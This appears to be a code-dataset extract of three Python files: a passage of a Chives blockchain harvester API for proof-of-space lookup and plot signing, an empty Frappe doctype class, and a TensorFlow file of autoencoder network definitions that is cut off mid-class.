from chives.types.blockchain_format.proof_of_space import ProofOfSpace
from chives.types.blockchain_format.sized_bytes import bytes32
from chives.util.api_decorators import api_request, peer_required
from chives.util.ints import uint8, uint32, uint64
from chives.wallet.derive_keys import master_sk_to_local_sk
class HarvesterAPI:
harvester: Harvester
def __init__(self, harvester: Harvester):
self.harvester = harvester
def _set_state_changed_callback(self, callback: Callable):
self.harvester.state_changed_callback = callback
@api_request
async def harvester_handshake(self, harvester_handshake: harvester_protocol.HarvesterHandshake):
"""
Handshake between the harvester and farmer. The harvester receives the pool public keys,
as well as the farmer pks, which must be put into the plots, before the plotting process begins.
We cannot use any plots which have different keys in them.
"""
self.harvester.plot_manager.set_public_keys(
harvester_handshake.farmer_public_keys, harvester_handshake.pool_public_keys
)
self.harvester.plot_manager.start_refreshing()
@peer_required
@api_request
async def new_signage_point_harvester(
self, new_challenge: harvester_protocol.NewSignagePointHarvester, peer: WSChivesConnection
):
"""
The harvester receives a new signage point from the farmer, this happens at the start of each slot.
The harvester does a few things:
1. The harvester applies the plot filter for each of the plots, to select the proportion which are eligible
for this signage point and challenge.
2. The harvester gets the qualities for each plot. This is approximately 7 reads per plot which qualifies.
Note that each plot may have 0, 1, 2, etc qualities for that challenge: but on average it will have 1.
3. Checks the required_iters for each quality and the given signage point, to see which are eligible for
inclusion (required_iters < sp_interval_iters).
4. Looks up the full proof of space in the plot for each quality, approximately 64 reads per quality
5. Returns the proof of space to the farmer
"""
if not self.harvester.plot_manager.public_keys_available():
# This means that we have not received the handshake yet
return None
start = time.time()
assert len(new_challenge.challenge_hash) == 32
loop = asyncio.get_running_loop()
def blocking_lookup(filename: Path, plot_info: PlotInfo) -> List[Tuple[bytes32, ProofOfSpace]]:
# Uses the DiskProver object to lookup qualities. This is a blocking call,
# so it should be run in a thread pool.
try:
plot_id = plot_info.prover.get_id()
sp_challenge_hash = ProofOfSpace.calculate_pos_challenge(
plot_id,
new_challenge.challenge_hash,
new_challenge.sp_hash,
)
try:
quality_strings = plot_info.prover.get_qualities_for_challenge(sp_challenge_hash)
except Exception as e:
self.harvester.log.error(f"Error using prover object {e}")
self.harvester.log.error(
f"File: {filename} Plot ID: {plot_id.hex()}, "
f"challenge: {sp_challenge_hash}, plot_info: {plot_info}"
)
return []
responses: List[Tuple[bytes32, ProofOfSpace]] = []
if quality_strings is not None:
difficulty = new_challenge.difficulty
sub_slot_iters = new_challenge.sub_slot_iters
if plot_info.pool_contract_puzzle_hash is not None:
# If we are pooling, override the difficulty and sub slot iters with the pool threshold info.
# This will mean more proofs actually get found, but they are only submitted to the pool,
# not the blockchain
for pool_difficulty in new_challenge.pool_difficulties:
if pool_difficulty.pool_contract_puzzle_hash == plot_info.pool_contract_puzzle_hash:
difficulty = pool_difficulty.difficulty
sub_slot_iters = pool_difficulty.sub_slot_iters
# Found proofs of space (on average 1 is expected per plot)
for index, quality_str in enumerate(quality_strings):
required_iters: uint64 = calculate_iterations_quality(
self.harvester.constants.DIFFICULTY_CONSTANT_FACTOR,
quality_str,
plot_info.prover.get_size(),
difficulty,
new_challenge.sp_hash,
)
sp_interval_iters = calculate_sp_interval_iters(self.harvester.constants, sub_slot_iters)
if required_iters < sp_interval_iters:
# Found a very good proof of space! will fetch the whole proof from disk,
# then send to farmer
try:
proof_xs = plot_info.prover.get_full_proof(
sp_challenge_hash, index, self.harvester.parallel_read
)
except Exception as e:
self.harvester.log.error(f"Exception fetching full proof for {filename}. {e}")
self.harvester.log.error(
f"File: {filename} Plot ID: {plot_id.hex()}, challenge: {sp_challenge_hash}, "
f"plot_info: {plot_info}"
)
continue
responses.append(
(
quality_str,
ProofOfSpace(
sp_challenge_hash,
plot_info.pool_public_key,
plot_info.pool_contract_puzzle_hash,
plot_info.plot_public_key,
uint8(plot_info.prover.get_size()),
proof_xs,
),
)
)
return responses
except Exception as e:
self.harvester.log.error(f"Unknown error: {e}")
return []
async def lookup_challenge(
filename: Path, plot_info: PlotInfo
) -> Tuple[Path, List[harvester_protocol.NewProofOfSpace]]:
# Executes a DiskProverLookup in a thread pool, and returns responses
all_responses: List[harvester_protocol.NewProofOfSpace] = []
if self.harvester._is_shutdown:
return filename, []
proofs_of_space_and_q: List[Tuple[bytes32, ProofOfSpace]] = await loop.run_in_executor(
self.harvester.executor, blocking_lookup, filename, plot_info
)
for quality_str, proof_of_space in proofs_of_space_and_q:
all_responses.append(
harvester_protocol.NewProofOfSpace(
new_challenge.challenge_hash,
new_challenge.sp_hash,
quality_str.hex() + str(filename.resolve()),
proof_of_space,
new_challenge.signage_point_index,
)
)
return filename, all_responses
awaitables = []
passed = 0
total = 0
with self.harvester.plot_manager:
for try_plot_filename, try_plot_info in self.harvester.plot_manager.plots.items():
try:
if try_plot_filename.exists():
# Passes the plot filter (does not check sp filter yet though, since we have not reached sp)
# This is being executed at the beginning of the slot
total += 1
if ProofOfSpace.passes_plot_filter(
self.harvester.constants,
try_plot_info.prover.get_id(),
new_challenge.challenge_hash,
new_challenge.sp_hash,
):
passed += 1
awaitables.append(lookup_challenge(try_plot_filename, try_plot_info))
except Exception as e:
self.harvester.log.error(f"Error plot file {try_plot_filename} may no longer exist {e}")
# Concurrently executes all lookups on disk, to take advantage of multiple disk parallelism
total_proofs_found = 0
for filename_sublist_awaitable in asyncio.as_completed(awaitables):
filename, sublist = await filename_sublist_awaitable
time_taken = time.time() - start
if time_taken > 5:
self.harvester.log.warning(
f"Looking up qualities on {filename} took: {time_taken}. This should be below 5 seconds "
f"to minimize risk of losing rewards."
)
else:
pass
# If you want additional logs, uncomment the following line
# self.harvester.log.debug(f"Looking up qualities on {filename} took: {time_taken}")
for response in sublist:
total_proofs_found += 1
msg = make_msg(ProtocolMessageTypes.new_proof_of_space, response)
await peer.send_message(msg)
now = uint64(int(time.time()))
farming_info = FarmingInfo(
new_challenge.challenge_hash,
new_challenge.sp_hash,
now,
uint32(passed),
uint32(total_proofs_found),
uint32(total),
)
pass_msg = make_msg(ProtocolMessageTypes.farming_info, farming_info)
await peer.send_message(pass_msg)
self.harvester.log.info(
f"{len(awaitables)} plots were eligible for farming {new_challenge.challenge_hash.hex()[:10]}..."
f" Found {total_proofs_found} proofs. Time: {time.time() - start:.5f} s. "
f"Total {self.harvester.plot_manager.plot_count()} plots"
)
@api_request
async def request_signatures(self, request: harvester_protocol.RequestSignatures):
"""
The farmer requests a signature on the header hash, for one of the proofs that we found.
A signature is created on the header hash using the harvester private key. This can also
be used for pooling.
"""
plot_filename = Path(request.plot_identifier[64:]).resolve()
with self.harvester.plot_manager:
try:
plot_info = self.harvester.plot_manager.plots[plot_filename]
except KeyError:
self.harvester.log.warning(f"KeyError plot {plot_filename} does not exist.")
return None
# Look up local_sk from plot to save locked memory
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(plot_info.prover.get_memo())
local_sk = master_sk_to_local_sk(local_master_sk)
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
include_taproot = False
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
include_taproot = True
agg_pk = ProofOfSpace.generate_plot_public_key(local_sk.get_g1(), farmer_public_key, include_taproot)
# This is only a partial signature. When combined with the farmer's half, it will
# form a complete PrependSignature.
message_signatures: List[Tuple[bytes32, G2Element]] = []
for message in request.messages:
signature: G2Element = AugSchemeMPL.sign(local_sk, message, agg_pk)
message_signatures.append((message, signature))
response: harvester_protocol.RespondSignatures = harvester_protocol.RespondSignatures(
request.plot_identifier,
request.challenge_hash,
request.sp_hash,
local_sk.get_g1(),
farmer_public_key,
message_signatures,
)
return make_msg(ProtocolMessageTypes.respond_signatures, response)
@api_request
async def request_plots(self, _: harvester_protocol.RequestPlots):
plots_response = []
plots, failed_to_open_filenames, no_key_filenames = self.harvester.get_plots()
for plot in plots:
plots_response.append(
Plot(
plot["filename"],
plot["size"],
plot["plot_id"],
plot["pool_public_key"],
plot["pool_contract_puzzle_hash"],
plot["plot_public_key"],
plot["file_size"],
plot["time_modified"],
)
)
response = harvester_protocol.RespondPlots(plots_response, failed_to_open_filenames, no_key_filenames)
return make_msg(ProtocolMessageTypes.respond_plots, response)
| 48.824324 | 117 | 0.590991 |
ace8eefd93cf2c2299e5a2aca3aac6b3a99efd10 | 262 | py | Python | norden/norden/doctype/ds_smart_analytics/ds_smart_analytics.py | thispl/norden | 2a208056e948cae42da688e28c15024124254867 | [
"MIT"
] | null | null | null | norden/norden/doctype/ds_smart_analytics/ds_smart_analytics.py | thispl/norden | 2a208056e948cae42da688e28c15024124254867 | [
"MIT"
] | null | null | null | norden/norden/doctype/ds_smart_analytics/ds_smart_analytics.py | thispl/norden | 2a208056e948cae42da688e28c15024124254867 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2021, Teampro and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class DSSmartAnalytics(Document):
pass
| 23.818182 | 49 | 0.778626 |
ace8ef7d53a23a4b0e661042b19f757c3f6c5bd3 | 48,150 | py | Python | src/tf_model.py | stewarthe6/NCI-DOE-Collab-Pilot1-Semi-Supervised-Feature-Learning-with-Center-Loss | db63415daa684eaadeefd6845032d8a86608b79e | [
"MIT"
] | null | null | null | src/tf_model.py | stewarthe6/NCI-DOE-Collab-Pilot1-Semi-Supervised-Feature-Learning-with-Center-Loss | db63415daa684eaadeefd6845032d8a86608b79e | [
"MIT"
] | null | null | null | src/tf_model.py | stewarthe6/NCI-DOE-Collab-Pilot1-Semi-Supervised-Feature-Learning-with-Center-Loss | db63415daa684eaadeefd6845032d8a86608b79e | [
"MIT"
] | 1 | 2021-08-11T16:20:16.000Z | 2021-08-11T16:20:16.000Z | from __future__ import division, print_function, absolute_import
import tensorflow as tf
from tf_layers import *
from tf_selu import selu
import math
def getNetwork(t):
print("using AE", t)
if t == 'wide':
return Regression_Wide
if t == 'encoded':
return Regression_Encoded
if t == 'chem':
return AutoEncoder_Chem
if t == 'sig':
return AutoEncoder_Chem_Sigmoid
if t == 'ecfp':
return AutoEncoder_Chem_ECFP
if t == 'ecfp_sig':
return AutoEncoder_Chem_ECFP_sig
if t == 'ecfp_sig_bn':
return AutoEncoder_Chem_ECFP_sig_bn
if t == 'flat':
return AutoEncoder_Chem_Flat
if t == 'ecfp_two':
return AutoEncoder_ECFP_Two
if t == 'ecfp_three':
return AutoEncoder_ECFP_Three
if t == 'ecfp_five':
return AutoEncoder_ECFP_Five
if t == 'ecfp_three_bn':
return AutoEncoder_ECFP_Three_BN
if t == 'ecfp_skinny_bn':
return AutoEncoder_ECFP_Skinny_BN
if t == 'ecfp_selu':
return AutoEncoder_ECFP_SELU
if t == 'ecfp_selu_five':
return AutoEncoder_ECFP_SELU_Five
if t == 'ecfp_selu_two':
return AutoEncoder_ECFP_SELU_Two
if t == 'rnaseq_selu':
return RNASEQ_SELU
if t == 'rnaseq_selu_big':
return RNASEQ_SELU_big
if t == 'rnaseq_relu_big':
return RNASEQ_RELU_big
if t == 'rnaseq_sig_big':
return RNASEQ_Sig_big
if t == 'rnaseq_selu_bigger':
return RNASEQ_SELU_bigger
if t == 'rnaseq_selu_sq':
return RNASEQ_SELU_sq
if t == 'rnaseq_selu_1k':
return RNASEQ_SELU_1k
if t == 'rnaseq_sq':
return RNASEQ_sq
if t == 'lbexp_selu':
return LBEXP_SELU
if t == 'lbexp_relu':
return LBEXP_RELU
if t == 'tox_relu':
return TOX_RELU
if t == 'tox_relu_reg':
return TOX_RELU_REG
if t == 'rnaseq_selu_big':
return RNASEQ_SELU_big
if t == 'fang_relu_dragon':
return FANG_RELU_DRAGON
if t == 'fang_relu_gene':
return FANG_RELU_GENE
print("unrecognized autoencoder type", t)
class Regression_Wide:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x):
test = not self.is_training
fc1 = batch_normalized_linear_layer(x, "fc1", 2000, stddev=1, wd=.004, test=test)
fc2 = batch_normalized_linear_layer(fc1, "fc2", 500, stddev=1, wd=.004, test=test)
fc3 = batch_normalized_linear_layer(fc2, "fc3", 100, stddev=1, wd=.004, test=test)
fc3_out = linear_layer(fc3, 'fc3_out', 1, stddev=1, wd=.004, nonlinearity=None)
return fc3_out
class Regression_Encoded:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x):
test = not self.is_training
#fc1 = batch_normalized_linear_layer(x, "fc1", 50, stddev=1, wd=.004, test=test)
#fc2 = batch_normalized_linear_layer(x, "fc2", 25, stddev=1, wd=.004, test=test)
#fc3 = batch_normalized_linear_layer(fc2, "fc3", 12, stddev=1, wd=.004, test=test)
fc3_out = linear_layer(x, 'fc3_out', 1, stddev=1, wd=.004, nonlinearity=None)
return fc3_out
class AutoEncoder_Chem_Sigmoid:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
print("using the correct AE class")
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x):
test = not self.is_training
fc1 = linear_layer(x, "fc1", 2000, stddev=.005, wd=.004, nonlinearity=tf.sigmoid)
fc2 = linear_layer(fc1, "fc2", 500, stddev=.005, wd=.004, nonlinearity=tf.sigmoid)
fc3_out = linear_layer(fc2, "fc3_3", 100, stddev=.005, wd=.004, nonlinearity=tf.sigmoid)
return fc3_out
# Building the decoder
def decoder(self, x):
test = not self.is_training
de_fc1 = linear_layer(x, "de_fc1", 500, stddev=.005, wd=.004, nonlinearity=tf.sigmoid)
de_fc2 = linear_layer(de_fc1, "de_fc2", 2000, stddev=.005, wd=.004, nonlinearity=tf.sigmoid)
de_fc3_out = linear_layer(de_fc2, 'de_fc3_out', self.width, stddev=.005, wd=.004)
return de_fc3_out
class AutoEncoder_Chem:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x):
test = not self.is_training
fc1 = batch_normalized_linear_layer(x, "fc1", 2000, stddev=.005, wd=.004, test=test)
fc2 = batch_normalized_linear_layer(fc1, "fc2", 500, stddev=.005, wd=.004, test=test)
fc3_out = linear_layer(fc2, "fc3_3", 100, stddev=.005, wd=.004)
return fc3_out
# Building the decoder
def decoder(self, x):
test = not self.is_training
de_fc1 = batch_normalized_linear_layer(x, "de_fc1", 500, stddev=.005, wd=.004, test=test)
de_fc2 = batch_normalized_linear_layer(de_fc1, "de_fc2", 2000, stddev=.005, wd=.004, test=test)
de_fc3_out = linear_layer(de_fc2, 'de_fc3_out', self.width, stddev=.005, wd=.004)
return de_fc3_out
class AutoEncoder_Chem_Flat:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
print("using flat network")
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x):
test = not self.is_training
fc1 = linear_layer(x, "fc1", 100, stddev=.005, wd=.004)
return fc1
# Building the decoder
def decoder(self, x):
test = not self.is_training
de_fc1 = linear_layer(x, 'de_fc1', self.width, stddev=.005, wd=.004)
return de_fc1
class AutoEncoder_Chem_ECFP:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
print("AE for ECFP")
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x):
test = not self.is_training
fc1 = linear_layer(x, "fc1", 2000, stddev=.01, wd=.004)
fc2 = linear_layer(fc1, "fc2", 1000, stddev=.01, wd=.004)
fc3 = linear_layer(fc2, "fc3", 500, stddev=.01, wd=.004)
fc4 = linear_layer(fc3, "fc4", 250, stddev=.01, wd=.004)
fc5_out = linear_layer(fc4, "fc5_out", 100, stddev=.01, wd=.004)
return fc5_out
# Building the decoder
def decoder(self, x):
test = not self.is_training
de_fc1 = linear_layer(x, "de_fc1", 250, stddev=.01, wd=.004)
de_fc2 = linear_layer(de_fc1, "de_fc2", 500, stddev=.01, wd=.004)
de_fc3 = linear_layer(de_fc2, "de_fc3", 1000, stddev=.01, wd=.004)
de_fc4 = linear_layer(de_fc3, "de_fc4", 2000, stddev=.01, wd=.004)
de_fc5_out = linear_layer(de_fc4, 'de_fc5_out', self.width, stddev=.01, wd=.004)
return de_fc5_out
def intense_sigmoid(X, name=None):
return tf.nn.sigmoid(1*X)
class AutoEncoder_Chem_ECFP_sig:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
print("AE for ECFP_sig")
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x):
test = not self.is_training
fc1 = linear_layer(x, "fc1", 2000, stddev=.01, wd=.004)
fc2 = linear_layer(fc1, "fc2", 1000, stddev=.01, wd=.004)
fc3 = linear_layer(fc2, "fc3", 500, stddev=.01, wd=.004)
fc4 = linear_layer(fc3, "fc4", 250, stddev=.01, wd=.004)
fc5_out = linear_layer(fc4, "fc5_out", 100, stddev=.01, wd=.004)
return fc5_out
# Building the decoder
def decoder(self, x):
test = not self.is_training
de_fc1 = linear_layer(x, "de_fc1", 250, stddev=.01, wd=.004)
de_fc2 = linear_layer(de_fc1, "de_fc2", 500, stddev=.01, wd=.004)
de_fc3 = linear_layer(de_fc2, "de_fc3", 1000, stddev=.01, wd=.004)
de_fc4 = linear_layer(de_fc3, "de_fc4", 2000, stddev=.01, wd=.004)
de_fc5_out = linear_layer(de_fc4, 'de_fc5_out', self.width, stddev=.01, wd=.004, nonlinearity=intense_sigmoid)
return de_fc5_out
class AutoEncoder_Chem_ECFP_sig_bn:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
print("AE for ECFP_sig_bn")
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x):
test = not self.is_training
fc1 = batch_normalized_linear_layer(x, "fc1", 2000, stddev=.01, wd=.004, test=test)
fc2 = batch_normalized_linear_layer(fc1, "fc2", 1000, stddev=.01, wd=.004, test=test)
fc3 = batch_normalized_linear_layer(fc2, "fc3", 500, stddev=.01, wd=.004, test=test)
fc4 = batch_normalized_linear_layer(fc3, "fc4", 250, stddev=.01, wd=.004, test=test)
fc5_out = linear_layer(fc4, "fc5_out", 100, stddev=.01, wd=.004)
return fc5_out
# Building the decoder
def decoder(self, x):
test = not self.is_training
de_fc1 = batch_normalized_linear_layer(x, "de_fc1", 250, stddev=.01, wd=.004, test=test)
de_fc2 = batch_normalized_linear_layer(de_fc1, "de_fc2", 500, stddev=.01, wd=.004, test=test)
de_fc3 = batch_normalized_linear_layer(de_fc2, "de_fc3", 1000, stddev=.01, wd=.004, test=test)
de_fc4 = batch_normalized_linear_layer(de_fc3, "de_fc4", 2000, stddev=.01, wd=.004, test=test)
de_fc5_out = linear_layer(de_fc4, 'de_fc5_out', self.width, stddev=.01, wd=.004, nonlinearity=intense_sigmoid)
return de_fc5_out
class AutoEncoder_ECFP_Two:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
print("AE for ECFP_two")
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay):
test = not self.is_training
fc1 = linear_layer(x, "fc1", 100, stddev=.04, wd=None)
fc2_out = linear_layer(fc1, "fc2_out", 100, stddev=.04, wd=None)
return fc2_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
de_fc1 = linear_layer(x, "de_fc1", 100, stddev=.04, wd=None)
de_fc2_out = linear_layer(de_fc1, 'de_fc2_out', self.width, stddev=.04, \
wd=None, nonlinearity=tf.nn.relu)
return de_fc2_out
class AutoEncoder_ECFP_Three:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
print("AE for ECFP_three")
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay):
test = not self.is_training
fc1 = linear_layer(x, "fc1", 500, stddev=.04, wd=None)
fc2 = linear_layer(fc1, 'fc2', 250, stddev=.04, wd=None)
fc3_out = linear_layer(fc2, "fc3_out", 100, stddev=.04, wd=None)
return fc3_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
de_fc1 = linear_layer(x, "de_fc1", 250, stddev=.04, wd=None)
de_fc2 = linear_layer(de_fc1, "de_fc2", 500, stddev=.04, wd=None)
de_fc3_out = linear_layer(de_fc2, 'de_fc3_out', self.width, stddev=.04, \
wd=None, nonlinearity=tf.sigmoid)
return de_fc3_out
class AutoEncoder_ECFP_Five:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
print("AE for ECFP_three")
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay):
test = not self.is_training
fc1 = linear_layer(x, "fc1", 200, stddev=.04, wd=None)
fc2 = linear_layer(fc1, 'fc2', 150, stddev=.04, wd=None)
fc3 = linear_layer(fc2, "fc3", 100, stddev=.04, wd=None)
fc4 = linear_layer(fc3, "fc4", 100, stddev=.04, wd=None)
fc5_out = linear_layer(fc4, "fc5_out", 100, stddev=.04, wd=None)
return fc5_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
de_fc1 = linear_layer(x, "de_fc1", 100, stddev=.04, wd=None)
de_fc2 = linear_layer(de_fc1, "de_fc2", 100, stddev=.04, wd=None)
de_fc3 = linear_layer(de_fc2, "de_fc3", 150, stddev=.04, wd=None)
de_fc4 = linear_layer(de_fc3, "de_fc4", 200, stddev=.04, wd=None)
de_fc5_out = linear_layer(de_fc4, 'de_fc5_out', self.width, stddev=.04, \
wd=None, nonlinearity=tf.sigmoid)
return de_fc5_out
class AutoEncoder_ECFP_SELU_Two:
def __init__(self, numFeatures, is_training=True):
# self.width is how many features make up the input/output
print("AE for ECFP_two_SELU")
self.width = numFeatures
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay):
test = not self.is_training
f1_width = 100
fc1 = linear_layer(x, 'fc1', f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
nonlinearity=selu)
self.f2_out_width = 100
fc2_out = linear_layer(fc1, "fc2_out", self.f2_out_width, stddev=math.sqrt(1./f1_width), \
wd=weight_decay, nonlinearity=selu)
return fc2_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
f1_width = 100
de_fc1 = linear_layer(x, "de_fc1", f1_width, stddev=math.sqrt(1./self.f2_out_width), \
wd=weight_decay, nonlinearity=selu)
de_fc2_out = linear_layer(de_fc1, 'de_fc2_out', self.width, stddev=math.sqrt(1./f1_width), \
wd=weight_decay, nonlinearity=tf.nn.relu)
return de_fc2_out
class AutoEncoder_ECFP_SELU_Five:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for ECFP_SELU_Five")
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
f1_width = 200
fc1 = linear_layer(x, "ecfps5_fc1", f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
nonlinearity=selu)
f2_width = 150
fc2 = linear_layer(fc1, 'ecfps5_fc2', f2_width, stddev=math.sqrt(1./f1_width), wd=weight_decay, \
nonlinearity=selu)
f3_width = 100
fc3 = linear_layer(fc2, 'ecfps5_fc3', f3_width, stddev=math.sqrt(1./f2_width), wd=weight_decay, \
nonlinearity=selu)
f4_width = 100
fc4 = linear_layer(fc3, 'ecfps5_fc4', f4_width, stddev=math.sqrt(1./f3_width), wd=weight_decay, \
nonlinearity=selu)
self.f5_out_width = 100
fc5_out = linear_layer(fc4, "ecfps5_fc5_out", self.f5_out_width, stddev=math.sqrt(1./f4_width), \
wd=weight_decay, nonlinearity=selu)
return fc5_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
f1_width = 100
de_fc1 = linear_layer(x, "ecfps5_de_fc1", f1_width, stddev=math.sqrt(1./self.f5_out_width), \
wd=weight_decay, nonlinearity=selu)
f2_width = 100
de_fc2 = linear_layer(de_fc1, "ecfps5_de_fc2", f2_width, stddev=math.sqrt(1./f1_width), \
wd=weight_decay, nonlinearity=selu)
f3_width = 150
de_fc3 = linear_layer(de_fc2, "ecfps5_de_fc3", f3_width, stddev=math.sqrt(1./f2_width), \
wd=weight_decay, nonlinearity=selu)
f4_width = 200
de_fc4 = linear_layer(de_fc3, "ecfps5_de_fc4", f4_width, stddev=math.sqrt(1./f3_width), \
wd=weight_decay, nonlinearity=selu)
de_fc5_out = linear_layer(de_fc4, 'ecfps5_de_fc5_out', self.width, stddev=math.sqrt(1./f4_width), \
wd=weight_decay, nonlinearity=tf.nn.relu)
return de_fc5_out
class AutoEncoder_ECFP_SELU:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for ECFP_three_SELU")
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
f1_width = 500
fc1 = linear_layer(x, "ecfps_fc1", f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
f2_width = 250
fc2 = linear_layer(fc1, 'ecfps_fc2', f2_width, stddev=math.sqrt(1./f1_width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
self.f3_out_width = 100
fc3_out = linear_layer(fc2, "ecfps_fc3_out", self.f3_out_width, stddev=math.sqrt(1./f2_width), \
wd=weight_decay, nonlinearity=selu, reuse=reuse)
return fc3_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
f1_width = 250
de_fc1 = linear_layer(x, "ecfps_de_fc1", f1_width, stddev=math.sqrt(1./self.f3_out_width), \
wd=weight_decay, nonlinearity=selu)
f2_width = 500
de_fc2 = linear_layer(de_fc1, "ecfps_de_fc2", f2_width, stddev=math.sqrt(1./f1_width), \
wd=weight_decay, nonlinearity=selu)
de_fc3_out = linear_layer(de_fc2, 'ecfps_de_fc3_out', self.width, stddev=math.sqrt(1./f2_width), \
wd=weight_decay, nonlinearity=tf.nn.relu)
print("out layer has width", self.width)
return de_fc3_out
class RNASEQ_SELU_big:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for RNASEQ_SELU_big")
self.is_training = is_training
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
f1_width = 5000
fc1 = linear_layer(x, "rnasb_fc1", f1_width, stddev=math.sqrt(1./self.width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
f2_width = 2000
fc2 = linear_layer(fc1, 'rnasb_fc2', f2_width, stddev=math.sqrt(1./f1_width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
f3_width = 400
fc3 = linear_layer(fc2, 'rnasb_fc3', f3_width, stddev=math.sqrt(1./f2_width), wd=weight_decay, \
nonlinearity=selu, reuse=reuse)
self.f4_out_width = 200
fc4_out = linear_layer(fc3, "rnasb_fc4_out", self.f4_out_width, stddev='Xav', \
wd=weight_decay, nonlinearity=None, reuse=reuse)
return fc4_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
f1_width = 400
de_fc1 = linear_layer(x, "rnasb_de_fc1", f1_width, stddev=math.sqrt(1./self.f4_out_width), \
wd=weight_decay, nonlinearity=selu)
f2_width = 2000
de_fc2 = linear_layer(de_fc1, "rnasb_de_fc2", f2_width, stddev=math.sqrt(1./f1_width), \
wd=weight_decay, nonlinearity=selu)
f3_width = 5000
de_fc3 = linear_layer(de_fc2, "rnasb_de_fc3", f3_width, stddev=math.sqrt(1./f2_width), \
wd=weight_decay, nonlinearity=selu)
de_fc4_out = linear_layer(de_fc3, 'rnasb_de_fc4_out', self.width, stddev='Xav', \
wd=weight_decay, nonlinearity=None)
print("out layer has width", self.width)
return de_fc4_out
class RNASEQ_RELU_big:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for RNASEQ_RELU_big")
self.is_training = is_training
self.pfx = "rnarb"
# Building the encoder
def encoder(self, x, keep_prob, weight_decay, reuse=None):
test = not self.is_training
self.width = x.get_shape().as_list()[1]
print("x shape", x.get_shape().as_list())
print("self.width", self.width)
f1_width = 5000
fc1 = linear_layer(x, self.pfx+"_fc1", f1_width, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
f2_width = 2000
fc2 = linear_layer(fc1, self.pfx+'_fc2', f2_width, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
f3_width = 400
fc3 = linear_layer(fc2, self.pfx+'fc3', f3_width, stddev='Xav', wd=weight_decay, \
nonlinearity=tf.nn.relu, reuse=reuse)
self.f4_out_width = 200
fc4_out = linear_layer(fc3, "rnasb_fc4_out", self.f4_out_width, stddev='Xav', \
wd=weight_decay, nonlinearity=None, reuse=reuse)
return fc4_out
# Building the decoder
def decoder(self, x, keep_prob, weight_decay):
test = not self.is_training
f1_width = 400
de_fc1 = linear_layer(x, self.pfx+"_de_fc1", f1_width, stddev='Xav', \
wd=weight_decay, nonlinearity=tf.nn.relu)
f2_width = 2000
de_fc2 = linear_layer(de_fc1, self.pfx+"_de_fc2", f2_width, stddev='Xav', \
wd=weight_decay, nonlinearity=tf.nn.relu)
f3_width = 5000
de_fc3 = linear_layer(de_fc2, self.pfx+"_de_fc3", f3_width, stddev='Xav', \
wd=weight_decay, nonlinearity=tf.nn.relu)
de_fc4_out = linear_layer(de_fc3, self.pfx+'de_fc4_out', self.width, stddev='Xav', \
wd=weight_decay, nonlinearity=None)
print("out layer has width", self.width)
return de_fc4_out
class RNASEQ_Sig_big:
def __init__(self, is_training=True):
# self.width is how many features make up the input/output
print("AE for RNASEQ_Sig_big")
